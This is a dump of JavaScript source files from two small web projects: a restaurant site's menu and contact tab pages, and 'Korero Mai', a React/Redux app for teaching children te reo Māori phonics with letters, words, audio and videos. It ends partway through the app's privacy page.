phoneContainer.classList.add("subsectionContainer");
contactContent.appendChild(phoneContainer);
const phoneTitle = document.createElement("h2");
phoneTitle.classList.add("sectionTitle");
phoneTitle.innerHTML = "Phone Number";
phoneContainer.appendChild(phoneTitle);
const phoneNumber = document.createElement("p");
phoneNumber.classList.add("contactContent");
phoneNumber.innerHTML = "734-333-333";
phoneContainer.appendChild(phoneNumber);
footer();
};
export { contact };
<file_sep>/src/menu.js
import { footer } from "./footer.js";
const content = document.querySelector("#content");
const menu = () => {
// create the body
const menuContainer = document.createElement("div");
menuContainer.id = "contentContainer";
menuContainer.classList.add("contentArea");
content.appendChild(menuContainer);
// Scone and coffee photo by <NAME> on Unsplash
const sconeImage = document.createElement("img");
sconeImage.src = "images/jordan-christian-Tl6vDa-JRaE-unsplash.jpg";
sconeImage.setAttribute("alt", "A scone and lattee");
sconeImage.classList.add("backgroundImage");
menuContainer.appendChild(sconeImage);
// coffee Section
const coffeeContainer = document.createElement("div");
coffeeContainer.id = "coffeeSection";
coffeeContainer.classList.add("menuSection");
menuContainer.appendChild(coffeeContainer);
const coffeeTitle = document.createElement("h2");
coffeeTitle.classList.add("sectionTitle");
coffeeTitle.innerHTML = "Coffee";
coffeeContainer.appendChild(coffeeTitle);
// coffee 1
const pourOver = document.createElement("h3");
pourOver.classList.add("menuItem");
pourOver.innerHTML = "Pour Over $3";
coffeeContainer.appendChild(pourOver);
// coffee 2
const cappucino = document.createElement("h3");
cappucino.classList.add("menuItem");
cappucino.innerHTML = "Cappucino $4";
coffeeContainer.appendChild(cappucino);
// cookies
const cookieContainer = document.createElement("div");
cookieContainer.id = "cookieSection";
cookieContainer.classList.add("menuSection");
menuContainer.appendChild(cookieContainer);
const cookieTitle = document.createElement("h2");
cookieTitle.classList.add("sectionTitle");
cookieTitle.innerHTML = "Cookies";
cookieContainer.appendChild(cookieTitle);
// cookie 1
const oatMeal = document.createElement("h3");
oatMeal.classList.add("menuItem");
oatMeal.innerHTML = "Oatmeal Chocolate Walnut $2";
cookieContainer.appendChild(oatMeal);
// cookie 2
const candyCookie = document.createElement("h3");
candyCookie.classList.add("menuItem");
candyCookie.innerHTML = "M&M Sugar Cookie $2";
cookieContainer.appendChild(candyCookie);
// scones
const sconeContainer = document.createElement("div");
sconeContainer.id = "sconeSection";
sconeContainer.classList.add("menuSection");
menuContainer.appendChild(sconeContainer);
const sconeTitle = document.createElement("h2");
sconeTitle.classList.add("sectionTitle");
sconeTitle.innerHTML = "Scones";
sconeContainer.appendChild(sconeTitle);
// scones 1
const cheeseScone = document.createElement("h3");
cheeseScone.classList.add("menuItem");
cheeseScone.innerHTML = "Cheese Scone $3";
sconeContainer.appendChild(cheeseScone);
// scones 2
const orangeScone = document.createElement("h3");
orangeScone.classList.add("menuItem");
orangeScone.innerHTML = "Orange Scone $3";
sconeContainer.appendChild(orangeScone);
footer();
};
export { menu };
<file_sep>/src/index.js
import { header } from "./header.js";
import { about } from "./about.js";
import { menu } from "./menu.js";
import { contact } from "./contact.js";
const content = document.querySelector("#content");
let currentTab = "aboutLink";
function renderContentSection() {
if (currentTab == "aboutLink") {
about();
} else if (currentTab == "menuLink") {
menu();
} else if (currentTab == "contactLink") {
contact();
}
}
function updateHighlightedTab(e) {
pageLinks.forEach(link => link.classList.remove("selectedPage"));
const clickedTab = e.target;
clickedTab.classList.toggle("selectedPage");
currentTab = e.target.id;
}
function changePage(e) {
// update Nav tab highlight
updateHighlightedTab(e);
// clear the content before new rendering
const contentContainer = document.querySelector("#contentContainer");
contentContainer.remove();
const footer = document.querySelector("#footer");
footer.remove();
}
// render the first page load
header();
about();
// Nav event listeners
const pageLinks = document.querySelectorAll(".navBar");
pageLinks.forEach(link =>
link.addEventListener("click", e => {
changePage(e);
renderContentSection();
})
);
| 7989b058efa2083597f7d79c5b96886697463180 | [
"JavaScript",
"Markdown"
] | 5 | JavaScript | a6macleod/js_restaurant | 4092c86c33cbdd653a2e02c5ddc9b96fe4567457 | 1772a06dbc025c2589c904e9bc0c9f5b0c272762 |
refs/heads/master | <file_sep>package com.hexudong.service;
import java.util.List;
import com.hexudong.entity.Book;
public interface BookService {
List<Book> getList(String mhname);
List<Book> getSX();
Book getBookBybid(int bid);
void xg(int bid, String sjh, Integer hy);
}
<file_sep>package com.hexudong.entity;
import javax.validation.constraints.Pattern;
public class Book {
private Integer bid;//图书编号
private String bname;//图书名字
@Pattern(regexp="\\d{11}",message="11位数字")
private String sjh;//手机号
private String zz;//作者
private int hy;//受欢迎程度
private int tid;//类型id
private String lx;//类型别称
private Type type;//类型对象
public Integer getBid() {
return bid;
}
public void setBid(Integer bid) {
this.bid = bid;
}
public String getBname() {
return bname;
}
public void setBname(String bname) {
this.bname = bname;
}
public String getSjh() {
return sjh;
}
public void setSjh(String sjh) {
this.sjh = sjh;
}
public String getZz() {
return zz;
}
public void setZz(String zz) {
this.zz = zz;
}
public int getHy() {
return hy;
}
public void setHy(int hy) {
this.hy = hy;
}
public int getTid() {
return tid;
}
public void setTid(int tid) {
this.tid = tid;
}
public String getLx() {
return lx;
}
public void setLx(String lx) {
this.lx = lx;
}
public Type getType() {
return type;
}
public void setType(Type type) {
this.type = type;
}
}
| 1e35f17a750c72a92157fee4fc9e95a4ce798d2e | [
"Java"
] | 2 | Java | hexudong666/666 | eef1b039ab52fd22f0459f3509a6e80b56f0b728 | 1ae8ca42a773be6e5f422cdaec4094b99aec4f7b |
refs/heads/master | <file_sep>const React = require ('react')
const { Link } = require ('react-router')
const { connect } = require("react-redux")
class NavLink extends React.Component {
render() {
return (
<Link {...this.props} activeClassName='active'/>
)
}
}
module.exports = connect(state => state)(NavLink)
<file_sep>module.exports = {
letters: [
{
id: 1,
capital: 'A',
lowercase: 'a',
capitalSound: '/sounds/capitalSounds/A.mp3',
lowerSound: '/sounds/lowerSounds/a.mp3',
wordImage: [
{id:1, image:'images/words/ahi.svg', sound: 'sounds/ahi.mp3', description: 'ahi'},
{id:2, image:'images/words/anuhe.svg', sound: 'sounds/anuhe.mp3', description: 'anuhe'},
{id:3, image:'images/words/aroha.svg', sound: 'sounds/aroha.mp3', description: 'aroha'},
],
multimedia: [
'/multimedia/anuhe.webm',
'/multimedia/anuhe.mp4',
'/multimedia/anuhe.ogv',
],
mediaName: 'Anuhe - Caterpillar',
},
{
id: 2,
capital: 'E',
lowercase: 'e',
capitalSound: '/sounds/capitalSounds/E.mp3',
lowerSound: '/sounds/lowerSounds/e.mp3',
wordImage: [
{id:1, image:'images/words/eo.svg', sound: 'sounds/eo.mp3', description: 'eo'},
{id:2, image:'images/words/peke.svg', sound: 'sounds/peke.mp3', description: 'peke'},
{id:3, image:'images/words/kete.svg', sound: 'sounds/kete.mp3', description: 'kete'},
],
multimedia: [
'/multimedia/peke.webm',
'/multimedia/peke.mp4',
'/multimedia/peke.ogv',
],
mediaName: 'Peke - Jump',
},
{
id: 3,
capital: 'I',
lowercase: 'i',
capitalSound: '/sounds/capitalSounds/I.mp3',
lowerSound: '/sounds/lowerSounds/i.mp3',
wordImage: [
{id:1, image:'images/words/ika.svg', sound: 'sounds/ika.mp3', description: 'ika'},
{id:2, image:'images/words/ihu.svg', sound: 'sounds/ihu.mp3', description: 'ihu'},
{id:3, image:'images/words/irirangi.svg', sound: 'sounds/irirangi.mp3', description: 'irirangi'},
],
multimedia: [
'/multimedia/upoko.webm',
'/multimedia/upoko.mp4',
'/multimedia/upoko.ogv',
],
mediaName: 'Ihu - nose',
},
{
id: 4,
capital: 'O',
lowercase: 'o',
capitalSound: '/sounds/capitalSounds/O.mp3',
lowerSound: '/sounds/lowerSounds/o.mp3',
wordImage: [
{id:1, image:'images/words/one.svg', sound: '/sounds/one.mp3', description: 'one'},
{id:2, image:'images/words/ora.svg', sound: '/sounds/oma.mp3', description: 'oma'},
{id:3, image:'images/words/oru.svg', sound: 'sounds/oru.mp3', description: 'oru'},
],
multimedia: [
'/multimedia/oma.webm',
'/multimedia/oma.mp4',
'/multimedia/oma.ogv'
],
mediaName: 'Oma - Run',
},
{
id: 5,
capital: 'U',
lowercase: 'u',
capitalSound: '/sounds/capitalSounds/U.mp3',
lowerSound: '/sounds/lowerSounds/u.mp3',
wordImage: [
{id:1, image:'images/words/upoko.svg', sound: '/sounds/upoko.mp3', description: 'upoko'},
{id:2, image:'images/words/ua.svg', sound: '/sounds/ua.mp3', description: 'ua'},
{id:3, image:'images/words/ururoa.svg', sound: 'sounds/ururoa.mp3', description: 'ururoa'},
],
multimedia: [
'/multimedia/ua.webm',
'/multimedia/ua.mp4',
'/multimedia/ua.ogv',
],
mediaName: 'Ua - Rain',
},
{
id: 6,
capital: 'H',
lowercase: 'h',
capitalSound: '/sounds/capitalSounds/H.mp3',
lowerSound: '/sounds/lowerSounds/h.mp3',
wordImage: [
{id:1, image:'images/words/harakeke.svg', sound: 'sounds/harakeke.mp3', description: 'harakeke'},
{id:2, image:'images/words/hoiho.svg', sound: 'sounds/hoiho.mp3', description: 'hōiho'},
{id:3, image:'images/words/harikoa.svg', sound: 'sounds/harikoa.mp3', description: 'harikoa'},
],
multimedia: [
'/multimedia/hoiho.webm',
'/multimedia/hoiho.mp4',
'/multimedia/hoiho.ogv'
],
mediaName: 'Hōiho - Horse',
},
{
id: 7,
capital: 'K',
lowercase: 'k',
capitalSound: '/sounds/capitalSounds/K.mp3',
lowerSound: '/sounds/lowerSounds/k.mp3',
wordImage: [
{id:1, image:'images/words/kai.svg', sound: '/sounds/kai.mp3', description: 'kai'},
{id:2, image:'images/words/kakariki.svg', sound: '/sounds/kakariki.mp3', description: 'kākāriki'},
{id:3, image:'images/words/koura.svg', sound: 'sounds/koura.mp3', description: 'koura'},
],
multimedia: [
'/multimedia/kakariki.webm',
'/multimedia/kakariki.mp4',
'/multimedia/kakariki.ogv'
],
mediaName: 'Kākāriki - Green',
},
{
id: 8,
capital: 'M',
lowercase: 'm',
capitalSound: '/sounds/capitalSounds/M.mp3',
lowerSound: '/sounds/lowerSounds/m.mp3',
wordImage: [
{id:1, image:'images/words/maunga.svg', sound: '/sounds/maunga.mp3', description: 'maunga'},
{id:2, image:'images/words/manu.svg', sound: '/sounds/manu.mp3', description: 'manu'},
{id:3, image:'images/words/makawe.svg', sound: 'sounds/makawe.mp3', description: 'makawe'},
],
multimedia: [
'/multimedia/manu.webm',
'/multimedia/manu.mp4',
'/multimedia/manu.ogv'
],
mediaName: 'Manu - Bird',
},
{
id: 9,
capital: 'N',
lowercase: 'n',
capitalSound: '/sounds/capitalSounds/N.mp3',
lowerSound: '/sounds/lowerSounds/n.mp3',
wordImage: [
{id:1, image:'images/words/noke.svg', sound: '/sounds/noke.mp3', description: 'noke'},
{id:2, image:'images/words/niho.svg', sound: '/sounds/niho.mp3', description: 'niho'},
{id:3, image:'images/words/nikau.svg', sound: 'sounds/nikau.mp3', description: 'nikau'},
],
multimedia: [ '/multimedia/niho.webm',
'/multimedia/niho.mp4',
'/multimedia/niho.ogv'
],
mediaName: 'Niho - teeth',
},
{
id: 10,
capital: 'Ng',
lowercase: 'ng',
capitalSound: '/sounds/capitalSounds/NG.mp3',
lowerSound: '/sounds/lowerSounds/ng.mp3',
wordImage: [
{id:1, image:'images/words/ngahere.svg', sound: '/sounds/ngahere.mp3', description: 'ngahere'},
{id:2, image:'images/words/ngata.svg', sound: '/sounds/ngata.mp3', description: 'ngata'},
{id:3, image:'images/words/ngutu.svg', sound: 'sounds/ngutu.mp3', description: 'ngutu'},
],
multimedia: [
'/multimedia/ngata.webm',
'/multimedia/ngata.mp4',
'/multimedia/ngata.ogv'
],
mediaName: 'Ngata - Snail',
},
{
id: 11,
capital: 'P',
lowercase: 'p',
capitalSound: '/sounds/capitalSounds/P.mp3',
lowerSound: '/sounds/lowerSounds/p.mp3',
wordImage: [
{id:1, image:'images/words/pungawerewere.svg', sound: '/sounds/pungawerewere.mp3', description: 'pūngāwerewere'},
{id:2, image:'images/words/poi.svg', sound: '/sounds/poi.mp3', description: 'poi'},
{id:3, image:'images/words/paraoa.svg', sound: 'sounds/paraoa.mp3', description: 'paraoa'},
],
multimedia: [
'/multimedia/poi.webm',
'/multimedia/poi.mp4',
'/multimedia/poi.ogv'
],
mediaName: 'Poi - poi',
},
{
id: 12,
capital: 'R',
lowercase: 'r',
capitalSound: '/sounds/capitalSounds/R.mp3',
lowerSound: '/sounds/lowerSounds/r.mp3',
wordImage: [
{id:1, image:'images/words/ruru.svg', sound: '/sounds/ruru.mp3', description: 'ruru'},
{id:2, image:'images/words/ringa.svg', sound: '/sounds/ringa.mp3', description: 'ringa'},
{id:3, image:'images/words/rangi.svg', sound: 'sounds/rangi.mp3', description: 'rangi'},
],
multimedia: [
'/multimedia/ringa.webm',
'/multimedia/ringa.mp4',
'/multimedia/ringa.ogv',
],
mediaName: 'Ringa - Hand',
},
{
id: 13,
capital: 'T',
lowercase: 't',
capitalSound: '/sounds/capitalSounds/T.mp3',
lowerSound: '/sounds/lowerSounds/t.mp3',
wordImage: [
{id:1, image:'images/words/tinana.svg', sound: '/sounds/tinana.mp3', description: 'tinana'},
{id:2, image:'images/words/tohora.svg', sound: '/sounds/tohora.mp3', description: 'tohorā'},
{id:3, image:'images/words/tuatara.svg', sound: 'sounds/tuatara.mp3', description: 'tuatara'},
],
multimedia: [
'/multimedia/tohora.webm',
'/multimedia/tohora.mp4',
'/multimedia/tohora.ogv'
],
mediaName: 'Tohorā - Whale',
},
{
id: 14,
capital: 'W',
lowercase: 'w',
capitalSound: '/sounds/capitalSounds/W.mp3',
lowerSound: '/sounds/lowerSounds/w.mp3',
wordImage: [
{id:1, image:'images/words/waka.svg', sound: '/sounds/waka.mp3', description: 'waka'},
{id:2, image:'images/words/waewae.svg', sound: '/sounds/waewae.mp3', description: 'waewae'},
{id:3, image:'images/words/wai.svg', sound: 'sounds/wai.mp3', description: 'wai'},
],
multimedia: [
'/multimedia/waewae.webm',
'/multimedia/waewae.mp4',
'/multimedia/waewae.ogv'
],
mediaName: 'Waewae - Legs',
},
{
id: 15,
capital: 'Wh',
lowercase: 'wh',
capitalSound: '/sounds/capitalSounds/WH.mp3',
lowerSound: '/sounds/lowerSounds/wh.mp3',
wordImage: [
{id:1, image:'images/words/whatu.svg', sound: '/sounds/whatu.mp3', description: 'whatu'},
{id:2, image:'images/words/wheke.svg', sound: '/sounds/wheke.mp3', description: 'wheke'},
{id:3, image:'images/words/whare.svg', sound: 'sounds/whare.mp3', description: 'whare'},
],
multimedia: [
'/multimedia/wheke.webm',
'/multimedia/wheke.mp4',
'/multimedia/wheke.ogv'
],
mediaName: 'Wheke - Octopus',
},
{
id: 16,
capital: 'Ā',
lowercase: 'ā',
capitalSound: '/sounds/capitalSounds/AA.mp3',
lowerSound: '/sounds/lowerSounds/aa.mp3',
wordImage: [
{id:1, image:'images/words/aniwaniwa.svg', sound: '/sounds/aniwaniwa.mp3', description: 'āniwaniwa'},
{id:2, image:'images/words/aporo.svg', sound: '/sounds/aporo.mp3', description: 'āporo'},
{id:3, image:'images/words/arani.svg', sound: 'sounds/arani.mp3', description: 'ārani'},
],
multimedia: [ '/multimedia/aporo.webm',
'/multimedia/aporo.mp4',
'/multimedia/aporo.ogv'
],
mediaName: 'Āporo - apple',
},
{
id: 17,
capital: 'Ē',
lowercase: 'ē',
capitalSound: '/sounds/capitalSounds/EE.mp3',
lowerSound: '/sounds/lowerSounds/ee.mp3',
wordImage: [
{id:1, image:'images/words/weta.svg', sound: '/sounds/weta.mp3', description: 'wētā'},
{id:2, image:'images/words/ekara.svg', sound: '/sounds/ekara.mp3', description: 'ēkara'},
{id:3, image:'images/words/pekana.svg', sound: 'sounds/pekana.mp3', description: 'pēkana'},
],
multimedia: [
'/multimedia/ekara.webm',
'/multimedia/ekara.mp4',
'/multimedia/ekara.ogv'
],
mediaName: 'Ēkara - eagle',
},
{
id: 18,
capital: 'Ī',
lowercase: 'ī',
capitalSound: '/sounds/capitalSounds/II.mp3',
lowerSound: '/sounds/lowerSounds/ii.mp3',
wordImage: [
{id:1, image:'images/words/tihi.svg', sound: '/sounds/tihi.mp3', description: 'tīhi'},
{id:2, image:'images/words/kaki.svg', sound: '/sounds/kaki.mp3', description: 'kakī'},
{id:3, image:'images/words/miti.svg', sound: 'sounds/miti.mp3', description: 'mīti'},
],
multimedia: [
'/multimedia/kaki.webm',
'/multimedia/kaki.mp4',
'/multimedia/kaki.ogv'
],
mediaName: 'Kakī - neck',
},
{
id: 19,
capital: 'Ō',
lowercase: 'ō',
capitalSound: '/sounds/capitalSounds/OO.mp3',
lowerSound: '/sounds/lowerSounds/oo.mp3',
wordImage: [
{id:1, image:'images/words/totiti.svg', sound: '/sounds/totiti.mp3', description: 'tōtiti'},
{id:2, image:'images/words/netiporo.svg', sound: '/sounds/netiporo.mp3', description: 'netipōro'},
{id:3, image:'images/words/tohi.svg', sound: 'sounds/tohi.mp3', description: 'tōhi'},
],
multimedia: [
'/multimedia/netiporo.webm',
'/multimedia/netiporo.mp4',
'/multimedia/netiporo.ogv'
],
mediaName: 'Netipōro - Netball',
},
{
id: 20,
capital: 'Ū',
lowercase: 'ū',
capitalSound: '/sounds/capitalSounds/UU.mp3',
lowerSound: '/sounds/lowerSounds/uu.mp3',
wordImage: [
{id:1, image:'images/words/turu.svg', sound: '/sounds/turu.mp3', description: 'tūrū'},
{id:2, image:'images/words/purerehua.svg', sound: 'sounds/purerehua.mp3', description: 'pūrerehua'},
{id:3, image:'images/words/hapu.svg', sound: '/sounds/hapu.mp3', description: 'hapū'},
],
multimedia: [
'/multimedia/purerehua.webm',
'/multimedia/purerehua.mp4',
'/multimedia/purerehua.ogv',
],
mediaName: 'Pūrerehua - Butterfly',
},
],
letter: {},
completed: 0,
}
<file_sep>import React, { Component } from "react"
const oneImage = url =>
new Promise((resolve, reject) => {
const img = new Image()
img.onload = () => resolve(url)
img.onerror = () => reject(url)
img.src = url
})
const oneAudio = url =>
new Promise((resolve, reject) => {
const audio = new Audio()
audio.addEventListener("canplaythrough", () => resolve(audio), false)
audio.addEventListener("error", () => reject(audio))
audio.src = url
audio.load()
})
const image = url => (Array.isArray(url) ? Promise.all(url.map(oneImage)) : oneImage(url))
const audio = url => (Array.isArray(url) ? Promise.all(url.map(oneAudio)) : oneAudio(url))
class Preloader extends Component {
constructor(props) {
super(props)
this.state = { loading: true }
}
componentDidMount() {
this.load(this.props)
}
componentDidUpdate() {
this.load(this.props)
}
load({ images, audios }) {
Promise.all([
images ? image(images) : Promise.resolve(),
audios ? audio(audios) : Promise.resolve(),
]).then(([resultImages, resultAudios]) =>
this.setState({
loading: false,
images: resultImages.reduce(
(result, url, index) => ({ ...result, [url]: resultImages[index] }),
{},
),
audios: audios.reduce(
(result, url, index) => ({ ...result, [url]: resultAudios[index] }),
{},
),
}),
)
}
render() {
const { children } = this.props
const { loading, images, audios } = this.state
return <div>{loading ? <div className="loader" /> : children({ images, audios })}</div>
}
}
export default Preloader
<file_sep>import React from 'react'
import { connect } from 'react-redux'
import { Link } from 'react-router'
class Footer extends React.Component {
handleClick(e) {
e.preventDefault()
this.props.router.push('/')
}
render() {
return (
<div className='footer'>
<footer>
<Link to='/about' id='about'>
ABOUT US
</Link>
<Link to='/privacy' id='privacy'>
PRIVACY POLICY
</Link>
</footer>
</div>
)
}
}
module.exports = connect(state => state)(Footer)
<file_sep>import React from "react"
import { connect } from "react-redux"
import { Link } from "react-router"
class Header extends React.Component {
handleClick(e) {
e.preventDefault()
this.props.router.push("/")
}
render() {
return (
<div className="header">
<header>
<Link to="/">
<img id="header-logo" src="images/logo.svg" alt="logo" />
</Link>
<Link to="/media">
<img id="header-media" src="images/tv.png" alt="tv icon" />
</Link>
<Link to="/letters">
<img id="header-index" src="images/grid.png" alt="grid icon" />
</Link>
</header>
</div>
)
}
}
module.exports = connect(state => state)(Header)
<file_sep>// Note: Object.assign is another way of cloning the state.
// Check out: https://developer.mozilla.org/en/docs/Web/JavaScript/Reference/Global_Objects/Object/assign
const initialState = require('../../state')
module.exports = (state = initialState.letter, action) => {
switch (action.type) {
case 'RENDER_LETTER':
console.log('Reducer,',action.payload);
return Object.assign({},state, action.payload)
default: return state
}
}
<file_sep>const debug = require('debug')('components:Letterindex')
const React = require('react')
const { connect } = require('react-redux')
const request = require('superagent')
const { Link} = require('react-router')
const NavLink = require('./NavLink.js')
class Letterindex extends React.Component {
constructor(){
super()
this.nextButton = this.nextButton.bind(this)
this.previousButton = this.previousButton.bind(this)
}
handleClick(e) {
e.preventDefault()
}
nextButton(letter,letters,dispatch){
const id = letters.findIndex(item =>{
return item.id === letter.id
})
if(id === (letters.length -1)){
this.props.router.push(`/letterindex/${letters[0].capital}`)
dispatch({
type: 'RENDER_LETTER',
payload: letters[0],
})
}
else {
this.props.router.push(`/letterindex/${letters[id+1].capital}`)
dispatch({
type: 'RENDER_LETTER',
payload: letters[id+1],
})
}
}
previousButton(letter,letters,dispatch){
const id = letters.findIndex(item =>{
return item.id ===letter.id
})
if(id === 0){
this.props.router.push(`/letterindex/${letters[letters.length-1].capital}`)
dispatch({
type: 'RENDER_LETTER',
payload: letters[letters.length-1],
})
}
else {
this.props.router.push(`/letterindex/${letters[id-1].capital}`)
dispatch({
type: 'RENDER_LETTER',
payload: letters[id-1],
})
}
}
render() {
debug(this.props)
const { dispatch, letters, letter } = this.props
const currentLetter = letter.capital
return (
<div>
<img id='back' src='../../images/back.gif' alt='back button'
onClick={()=>
this.previousButton(letter, letters, dispatch)}
/>
{
letters.map((letter) => {
return (
<NavLink
key={letter.id}
to={`/letterindex/${letter.capital}`}
activeClassName='active'>
<div
className='btn-group btn-group-lg btn-group-center wiggle-me'
role='group'
aria-label='...'>
<button
type='button'
className='btn'
onClick={() =>
dispatch({
type: 'RENDER_LETTER',
payload: letter,
})
}>
{letter.capital}
</button>
</div>
</NavLink>
)
})
}
<img id='next' src='../../images/next.gif' alt='next button'
onClick={()=>
this.nextButton(letter, letters, dispatch)}
/>
</div>
)
}
}
module.exports = connect(state => state)(Letterindex)
<file_sep>const { combineReducers } = require('redux')
const letter = require('./letter')
const letters = require('./letters')
const completed = require('./completed')
module.exports = combineReducers({
letters,
letter,
completed,
})
<file_sep>Any developer wishing to contribute to this project is welcome to make a pull request which will be reviewed by the repo owners.
Thank you
<file_sep>const debug = require('debug')('components:Medialibrary')
import React from 'react'
import { connect } from 'react-redux'
import request from 'superagent'
import { Link } from 'react-router'
import Footer from './Footer'
import Header from './Header'
class Medialibrary extends React.Component {
handleClick(e) {
e.preventDefault()
}
render() {
debug(this.props)
const { dispatch, letters } = this.props
return (
<div className='medialibrary-container'>
<Header />
<div className='medialibrary-box'>
<h2>Ataata</h2>
<hr />
<h3>Choose a video to watch</h3>
<div className="medialibrary-images">
{
letters.map((letter, index) => {
return (
<div className='media-image' key={index}>
<Link key={letter.id} to={`/media/${letter.capital}`}>
<img
key={index}
src={`${letter.wordImage[1].image}`}
className='img-fluid'
onClick={() =>
dispatch({
type: 'RENDER_LETTER',
payload: letter,
})
} />
</Link>
</div>
)
})
}
</div>
</div>
<Footer />
</div>
)
}
}
module.exports = connect(state => state)(Medialibrary)
<file_sep># <NAME> - Learn te reo Māori Phonics
This app is aimed at Primary aged children, as a tool to help them learn te reo Māori phonics and high-usage words.
##Instructions for use on a local directory
Clone the repo into your workspace.
In the KoreroMai2 directory: npm i
To run the app in development use Node and in the terminal: npm run dev
To see the app in action: localhost:3000
or go to Heroku hosted web app: https://koreromai.maori.nz
# Using the App
The app is a simple library of the Māori alphabet, with some related multimedia files.
The user simply clicks on a letter they want to learn. They will see a page with a Capital, Lowercase and some images/words with the letter showing it in context. The letters and images can all be clicked on, and the user will hear the letter or word pronounced in te reo Māori. This can be repeated as many times as needed, to learn the correct pronounciation.
##Purpose
This app came about from a need for more digital teaching resources to help younger audiences learn the basics of a new language. Phonics is a building block for language, and the learning of which enables the user to move on to more complex words, grammar and other language features.
##Target audience
This app has specifically been designed for Primary school children, which in New Zealand is the ages between 5 - 9 years.
##Development Installations:
- If you're on linux:
- Install ruby: sudo apt-get install ruby-full
- Install Sass: sudo su -c "gem install sass"
- once downloaded: npm i
<file_sep>const express = require('express')
const path = require('path')
const logger = require('morgan')
const bodyParser = require('body-parser')
const api = require('./api')
module.exports = () => {
const app = express()
app.use(logger('dev'))
app.use(bodyParser.json())
app.use(bodyParser.urlencoded(
{ extended: false }))
app.set('trust proxy', 1) // trust first proxy
if (app.get('env') === 'development') {
const webpackDevMiddleware = require('webpack-dev-middleware')
const config = require('./webpack.config')
const webpack = require('webpack')
const compiler = webpack(config)
const livereload = require('livereload')
const lrserver = livereload.createServer()
lrserver.watch([
__dirname + '/public',
__dirname + '/src',
])
app.use(require('inject-lr-script')())
app.use(webpackDevMiddleware(compiler, {
noInfo: true,
publicPath: config.output.publicPath,
}))
}
// static files
app.use('/', express.static(path.join(__dirname, 'public')))
// routes
app.use('/api/v1/', api.appRoute())
// catch 404 and forward to error handler
app.use((req, res, next) => {
const err = new Error('Not Found')
err.status = 404
next(err)
})
// error handlers
// development error handler
// will print stacktrace
if (app.get('env') === 'development') {
app.use((err, req, res) => {
res.status(err.status || 500)
res.json({
message: err.message,
error: err,
})
})
}
// production error handler
// no stacktraces leaked to user
app.use((err, req, res) => {
res.status(err.status || 500)
res.json({
message: err.message,
error: {},
})
})
return app
}
<file_sep>import React from "react"
import { connect } from "react-redux"
import { browserHistory } from "react-router"
import { Player } from "video-react"
import Footer from "./Footer.js"
import Header from "./Header.js"
import "../../node_modules/video-react/dist/video-react.css" // import css
const debug = require("debug")("components:Mediashow")
class Mediashow extends React.Component {
handleClick(e) {
e.preventDefault()
this.props.router.push("/")
}
render() {
debug(this.props)
const { letter } = this.props
return (
<div className="container">
<Header />
<div className="video-box">
<h2>Mātaki mai</h2>
<div className="video">
<Player playsInline src={letter.multimedia[1]} type="video/mp4" />
</div>
<div>
<img
src="../../images/previous.png"
alt="back button"
onClick={browserHistory.goBack}
className="mediabackbutton"
/>
</div>
</div>
<Footer />
</div>
)
}
}
module.exports = connect(state => state)(Mediashow)
<file_sep>import React from "react"
import { connect } from "react-redux"
import { Link } from "react-router"
import Footer from "./Footer"
import Header from "./Header"
import Preloader from "./Preloader"
import ButtonLink from "./ButtonLink"
const debug = require("debug")("components:Displayletter")
const IMAGES = {
click: "/images/click.svg",
listen: "/images/listen.svg",
next: "/images/next.png",
previous: "/images/previous.png",
play: "/images/play.png",
}
const play = sound => () => {
sound.play()
}
const Words = ({ items = [] }) => (
<Preloader images={items.map(({ image }) => image)} audios={items.map(({ sound }) => sound)}>
{({ images, audios }) => (
<div style={{ minHeight: "200px" }} className="words-box">
{items.map(word => (
<div className="split-words" key={word.id}>
{images[word.image] ? (
<ButtonLink className="wordImage" onClick={play(audios[word.sound])}>
<img src={images[word.image]} alt={word.description} />
</ButtonLink>
) : (
<div className="spinner wordImage" />
)}
<p className="wordDescription">{word.description}</p>
</div>
))}
</div>
)}
</Preloader>
)
class DisplayLetter extends React.Component {
constructor() {
super()
this.go = this.go.bind(this)
this.getLetterIndex = this.getLetterIndex.bind(this)
}
getLetterIndex() {
const { letters, letter } = this.props
return letters.findIndex(item => item.id === letter.id)
}
go(direction) {
const { renderLetter, letters } = this.props
const index = this.getLetterIndex()
const nextIndex =
direction === "next"
? index === letters.length - 1
? 0
: index + 1
: index === 0
? letters.length - 1
: index - 1
const nextLetter = letters[nextIndex]
return () => {
this.props.router.push(`/letters/${nextLetter.capital}`)
renderLetter(nextLetter)
}
}
render() {
debug(this.props)
const { letter } = this.props
return (
<div className="container">
<Header />
<Preloader
images={[IMAGES.click, IMAGES.listen, IMAGES.previous, IMAGES.next, IMAGES.play]}
audios={[letter.capitalSound, letter.lowerSound]}
>
{({ images, audios }) => (
<div className="letter-box">
<div className="letters">
<ButtonLink onClick={this.go("previous")}>
<img id="previous-letter" src={images[IMAGES.previous]} alt="back button" />
</ButtonLink>
<p>Click on the letters and pictures</p>
<img src={images[IMAGES.click]} alt="click" width="30px" id="click-icon" />
<img src={images[IMAGES.listen]} alt="listen" width="30px" id="listen-icon" />
<ButtonLink className="letter-button" onClick={play(audios[letter.capitalSound])}>
{letter.capital}
</ButtonLink>
<ButtonLink className="letter-button" onClick={play(audios[letter.lowerSound])}>
{letter.lowercase}
</ButtonLink>
<ButtonLink onClick={this.go("next")}>
<img id="next-letter" src={images[IMAGES.next]} alt="next button" />
</ButtonLink>
</div>
<div className="word-container">
<Words items={letter.wordImage} />
<Link key={letter.id} to={`/media/${letter.capital}`}>
<img src={images[IMAGES.play]} alt="play" id="media-play" />
</Link>
</div>
</div>
)}
</Preloader>
<Footer />
</div>
)
}
}
export default connect(
({ letters }, { routeParams }) => ({
letters,
letter:
routeParams.id &&
letters.find(letter => letter.capital.toUpperCase() === routeParams.id.toUpperCase()),
}),
dispatch => ({
renderLetter: letter => dispatch({ type: "RENDER_LETTER", payload: letter }),
}),
)(DisplayLetter)
<file_sep>const debug = require('debug')('components:Privacy')
import React from 'react'
import { connect } from 'react-redux'
import { Link } from 'react-router'
import Footer from './Footer'
import Header from './Header'
class Privacy extends React.Component {
handleClick(e) {
e.preventDefault()
this.props.router.push('/')
}
render() {
debug(this.props)
return (
<div className='privacy-container'>
<Header />
<div className='privacy-box'>
<h2 className='privacy-heading'>Kōrero Mai Privacy Policy</h2>
<div className='privacy-articles'>
<p className='opening'>Your privacy on the Internet is important to us.
This privacy policy discloses what information we gather,
how we use it, and how to correct or change it.</p>
<h3>Information</h3>
<p className='article'>We do not gather or store any personal information from users of this web app, other than personal information, provided to us by
you through correspondence
and/or discussions.</p>
<h3>Security</h3>
<p className='article'>We are committed to ensuring that
your information is secure.
